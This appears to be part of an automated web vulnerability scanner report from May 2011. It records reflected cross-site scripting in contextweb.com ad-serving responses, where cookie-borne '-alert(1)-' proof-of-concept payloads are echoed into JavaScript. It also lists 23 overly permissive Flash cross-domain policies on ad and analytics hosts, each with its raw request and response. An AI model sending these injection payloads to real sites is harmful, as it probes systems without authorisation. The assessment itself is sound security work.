User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2583
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:17 GMT; path=/
Set-Cookie: 536156_4_101378=1304949617628; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524678643521|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:17 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=wOebwAz4UvVv1d57c'-alert(1)-'4e697206eb9" height="1" width="1" />
...[SNIP]...

3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3887a'-alert(1)-'d025171d98 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD13887a'-alert(1)-'d025171d98; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2644
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:18 GMT; path=/
Set-Cookie: 536156_4_101378=1304949618038; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524674394528|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:18 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.NEWSCURRENTAFFAIRS,536156,541,1697,1443,,LIFL1,FCRT1,ZETC1,AMQU2,NETM7,EXPD13887a'-alert(1)-'d025171d98,728X90" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 23 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad-apac.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ad.au.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Thu, 23 Oct 2008 00:22:36 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.3. http://adserver.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.4. http://adserverams.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserverams.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserverams.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.5. http://alvenda.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.6. http://api.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Thu, 10 Mar 2011 15:50:46 EST
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Mon, 09 May 2011 14:04:27 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.7. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 14:05:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://f2nthevine.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www22
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://ie-stat.bmmetrix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ie-stat.bmmetrix.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Last-Modified: Mon, 19 May 2008 17:46:09 GMT
ETag: "1dea8-c4-44d98f0503a40"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.10. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.11. http://in.getclicky.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:17 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "cb802f-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.12. http://ipcmedia.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www141
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.14. http://p.addthis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:01 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.15. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.16. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40491

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.17. http://secure-au.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.18. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:29 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.19. http://edge.viagogo.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.viagogo.co.uk

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:01:15 GMT
Expires: Tue, 10 May 2011 14:01:15 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: .VGGANON=qOnF8gMwzgEkAAAAMGY0MjJiMTAtZWEzOC00MTVkLWE5MWMtMjM3NWZmM2M0OGMx0; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:41:15 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=8e482fb9-b603-4f0f-8ec3-c8fd97b01e43; domain=viagogo.co.uk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1016
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.viagogo.net" />
<allow-access-from domain="*.viagogo.co.uk" />
<allow-access-from domain="*.viagogo.com" />
<allow-access-from domain="*.viagogo.at" />
<allow-access-from domain="*.viagogo.be" />
<allow-access-from domain="*.viagogo.ch" />
<allow-access-from domain="*.viagogo.de" />
<allow-access-from domain="*.viagogo.dk" />
<allow-access-from domain="*.viagogo.es" />
<allow-access-from domain="*.viagogo.fr" />
<allow-access-from domain="*.viagogo.ie" />
<allow-access-from domain="*.viagogo.it" />
<allow-access-from domain="*.viagogo.lu" />
<allow-access-from domain="*.viagogo.lv" />
<allow-access-from domain="*.viagogo.nl" />
<allow-access-from domain="*.viagogo.ru" />
<allow-access-from domain="*.viagogo.se" />
<allow-access-from domain="*.viagogo.pt" />
<allow-access-from domain="*.viagogo.pl" />
<allow-access-from domain="*.viagogo.co.za" />
...[SNIP]...

4.20. http://l.alvenda.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.alvenda.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.alvenda.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 489
Last-Modified: Tue, 22 Mar 2011 15:28:56 GMT
Server: Jetty(6.1.22)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="*.alvenda.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.alvenda.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="false"/>
...[SNIP]...

4.21. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:25 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.22. http://static.nme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.nme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.nme.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 05 May 2011 12:04:21 GMT
ETag: "15b82fe-3fa-4a2862c655b40"
Accept-Ranges: bytes
Content-Length: 1018
Content-Type: text/xml
Cache-Control: max-age=2592000
Expires: Wed, 08 Jun 2011 14:02:17 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="nme.com" />
   <allow-access-from domain="www.nme.com" secure="false" />
...[SNIP]...
<allow-access-from domain="web.nme.com" />
   <allow-access-from domain="*.nme.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcignite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcdigital.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.userplane.com" />
   <allow-access-from domain="*.panthercustomer.com" />
   <allow-access-from domain="*.adtech.de" />
   <allow-access-from domain="*.umee.tv" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.google-analytics.com" />
   <allow-access-from domain="*.ipcmediasecure.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nuts.co.uk" />
<allow-access-from domain="*.mousebreaker.com" />
...[SNIP]...

4.23. http://west.thomson.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: west.thomson.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 283
Content-Type: text/xml
Last-Modified: Mon, 15 Nov 2010 19:47:55 GMT
Accept-Ranges: bytes
ETag: ""
